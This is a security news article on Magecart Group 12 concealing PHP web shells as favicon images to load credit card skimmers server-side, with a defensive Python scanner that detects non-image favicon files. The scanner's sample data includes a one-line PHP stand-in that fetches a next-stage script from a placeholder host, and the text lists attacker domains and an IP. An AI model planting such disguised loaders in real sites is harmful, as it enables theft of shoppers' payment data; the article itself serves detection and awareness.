
Magecart Hackers Continue to Distribute New Malware through PHP-Based Backdoor

by CISOCONNECT Bureau

A new PHP-based skimmer has been discovered, revealing continuous Magecart Group 12 activity. Read on to know more…

Malicious PHP web shells disguised as favicons are being propagated by Magecart Group 12, a group of hackers who attack online businesses and e-commerce websites. The group can maintain remote access to the targeted servers via web shells. Then, in order to steal financial information, JavaScript skimmers are introduced into online shopping platforms.

Working Mechanism
Jérôme Segura, lead malware threat intelligence analyst at Malwarebytes, observed that malicious PHP web shells known as Megalodon or Smilodon are used to dynamically load JavaScript skimming code into online retailers' sites via server-side requests.

Instead of a legitimate shortcut icon tag, the PHP-based web shell is concealed on the targeted sites as a favicon whose path points to a fake PNG image file. The web shell is then configured to fetch the next-stage payload from an external host: a credit card skimmer that looks identical to previous Cardbleed variants.
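The defensive check that follows from this is simple: an icon referenced from a page's head must actually be an image. The scanner below is an added example, not Malwarebytes' tooling or anything from the original write-up. It collects the `href` of every `<link rel="…icon…">` tag, and for each referenced file checks whether the body starts with a real image signature and whether it carries a PHP open tag. The `fetch` callback, the sample HTML and the file bodies are all constructed here for illustration; the PHP body only stands in for "something that is not an image".

```python
"""Flag favicon links whose target is not a real image (e.g. a PHP web shell).

Hypothetical defender-side scanner written for this example. It does not fetch
anything itself: the caller supplies a fetch(href) -> bytes callback, so the
same logic can run against a crawl, a web-root checkout or an archived capture.
"""
import re
from html.parser import HTMLParser
from pathlib import PurePosixPath

# Leading bytes of the image formats a favicon is normally served as.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\x00\x00\x01\x00": "ico",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
}
IMAGE_EXTENSIONS = {".png", ".ico", ".gif", ".jpg", ".jpeg", ".svg"}
# "<?php" or the short echo tag "<?=" anywhere in the body.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


class IconLinkParser(HTMLParser):
    """Collect href values of <link> tags whose rel attribute contains 'icon'."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag != "link":
            return
        a = dict(attrs)
        rel_tokens = (a.get("rel") or "").lower().split()
        if "icon" in rel_tokens and a.get("href"):
            self.hrefs.append(a["href"])


def icon_links(html: str) -> list:
    """Return the hrefs of all icon / shortcut icon link tags in the document."""
    parser = IconLinkParser()
    parser.feed(html)
    return parser.hrefs


def classify_icon_file(href: str, body: bytes) -> dict:
    """Decide whether the bytes served for an icon href are what they claim to be."""
    fmt = next((name for magic, name in IMAGE_MAGIC.items() if body.startswith(magic)), None)
    has_php = PHP_OPEN_TAG.search(body) is not None
    ext = PurePosixPath(href.split("?", 1)[0]).suffix.lower()
    reasons = []
    if has_php:
        reasons.append("PHP open tag inside image body")
    if ext in IMAGE_EXTENSIONS and fmt is None and ext != ".svg":
        reasons.append("image extension but no image signature")
    if ext not in IMAGE_EXTENSIONS:
        reasons.append("icon link points at non-image extension %r" % ext)
    return {"href": href, "format": fmt, "contains_php": has_php,
            "suspicious": bool(reasons), "reasons": reasons}


def scan_page(html: str, fetch) -> list:
    """One verdict per icon link; fetch(href) must return the file body as bytes."""
    return [classify_icon_file(href, fetch(href)) for href in icon_links(html)]


# Constructed sample page and file bodies (not a real capture).
SAMPLE_HTML = """<html><head>
<link rel="shortcut icon" href="/favicon.ico">
<link rel="icon" type="image/png" href="/media/images/favicon.png">
</head><body></body></html>"""

SAMPLE_FILES = {
    # A minimal ICO header: reserved=0, type=1, one image entry (padding after).
    "/favicon.ico": b"\x00\x00\x01\x00\x01\x00" + b"\x00" * 32,
    # Claims to be a PNG but is PHP that pulls a next-stage file from elsewhere.
    "/media/images/favicon.png":
        b"<?php echo file_get_contents('https://next-stage.example.invalid/x.js'); ?>",
}

if __name__ == "__main__":
    for verdict in scan_page(SAMPLE_HTML, SAMPLE_FILES.__getitem__):
        print(verdict)
```

Because the check keys on the served bytes rather than the file name or the `type` attribute, a shell stored as `favicon.png` is flagged even though the HTML looks ordinary; the same function can be pointed at files on disk under the web root to catch copies that are not currently linked from any page.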

In most cases, injected skimmers perform a client-side request to an external JavaScript resource hosted on an attacker-controlled domain; in the newer attacks, that request is made server-side. In these formjacking attacks, the operators hide JavaScript skimmer code inside one or many e-commerce websites.

Malwarebytes' Jérôme Segura noted in a Thursday write-up that “These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online stores.”

“This technique is interesting as most client-side security tools will not be able to detect or block the skimmer.”

Based on the tactics, techniques, and procedures used, Malwarebytes attributed the newest attack to Magecart Group 12, adding “the newest domain name we found (zolo[.]pw) happens to be hosted on the same IP address (217.12.204[.]185) as recaptcha-in[.]pw and google-statik[.]pw, domains previously associated with Magecart Group 12.”

Past Attacks
Magecart attacks are getting more widespread, and they have recently attacked a number of online platforms around the world. Web shells were being used to insert JavaScript-based credit card skimmers into hacked online retailers in web skimming or Magecart attacks last month, according to VISA.

Magecart-style attacks were discovered in February exploiting Google’s Apps Script business application development platform to steal credit card information.

In September 2020, Magecart 12 threat actors were also implicated for a wave of attacks that used another novel skimmer, called “Ant and Cockroach” by RiskIQ, which impacted over 3,000 Magento 1 domains.

Concluding Words
Over the last several months, Magecart attackers have stepped up their efforts to infiltrate online retailers, using a variety of attack vectors to stay under the radar, escape detection, and steal data. Skimming has also become a popular and profitable industry for cybercriminals.

From leveraging Google Analytics and Telegram as an exfiltration channel to planting card stealer code inside image metadata and carrying out IDN homograph attacks to plant web skimmers hidden within a website’s favicon file, the cybercrime syndicate has ramped up its efforts to breach online stores.

As a result, businesses are advised to implement security measures that detect and prevent such skimming attempts.
